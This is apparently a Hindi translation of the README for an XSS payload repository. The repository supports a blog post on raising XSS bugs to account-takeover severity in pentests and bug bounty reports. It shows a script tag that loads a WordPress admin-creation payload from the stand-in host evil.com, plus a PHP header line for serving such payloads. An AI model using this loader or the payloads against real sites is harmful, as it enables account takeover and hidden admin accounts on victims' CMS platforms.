
XSS payloads designed to turn alert(1) into P1
वे XSS पेलोड जो alert(1) को P1 में बदलने के लिए डिज़ाइन किए गए हैं।
यह रेपो "How to Upgrade Your XSS Bugs from Medium to Critical" शीर्षक वाली एक ब्लॉगपोस्ट के साथ जारी किया गया था https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4
इस रेपो में आपको कई JavaScript फ़ाइलें मिलेंगी जिन्हें XSS पेलोड में लोड किया जा सकता है, ताकि पीड़ित के ब्राउज़र के संदर्भ में लोकप्रिय CMS प्लेटफ़ॉर्म पर संवेदनशील कार्य किए जा सकें। यह एक साधारण XSS बग को किसी अधिक गंभीर चीज़, जैसे अकाउंट टेकओवर, से जोड़ने में मदद कर सकता है।
यह वास्तविक सुरक्षा प्रभाव प्रदर्शित करके पेंटेस्ट या बग बाउंटी रिपोर्ट की गंभीरता को बढ़ाने के लिए एकदम सही है।
पेलोड्स को धीरे-धीरे जोड़ा जा रहा है, जैसे-जैसे मेरे पास समय होता है। आने वाले और भी कई पेलोड हैं; यदि आप मदद कर सकते हैं, तो pull requests का स्वागत है! यदि आप कुछ बनाने के लिए प्रेरणा ढूंढ रहे हैं, तो इस रेपो पर "issues" टैब देखें।
इन पेलोड्स का उपयोग करने का सबसे आसान तरीका है उन्हें कहीं होस्ट करना और अपने XSS पेलोड के लिए script टैग के src एट्रिब्यूट में लोड करना, जैसे:
<script src="http://evil.com/wordpress_create_admin_user.js"></script>
वैकल्पिक रूप से, पेलोड के संदर्भ और लंबाई के आधार पर, इसे कभी-कभी मिनिफ़ाइड, एन्कोडेड किया जा सकता है और फिर सीधे अनुरोध में शामिल किया जा सकता है।
JavaScript फ़ाइल होस्ट करने के लिए, आपको Content-Type को application/javascript सेट करने की आवश्यकता हो सकती है। इसे PHP के साथ पूरा करने के लिए, आप किसी भी पेलोड के शीर्ष पर यह पंक्ति जोड़ सकते हैं, इसे .php फ़ाइल के रूप में सहेज सकते हैं और इसे अपने PHP-सक्षम वेबसर्वर पर होस्ट कर सकते हैं:
<?php header("Content-Type: application/javascript"); ?>
यह लेख Shift8 का है, जिसने मुझे यह रेपो बनाने के लिए प्रेरित किया। लेख में JS में कुछ छोटी टाइपो हैं, लेकिन अवधारणाएँ बिल्कुल सटीक हैं।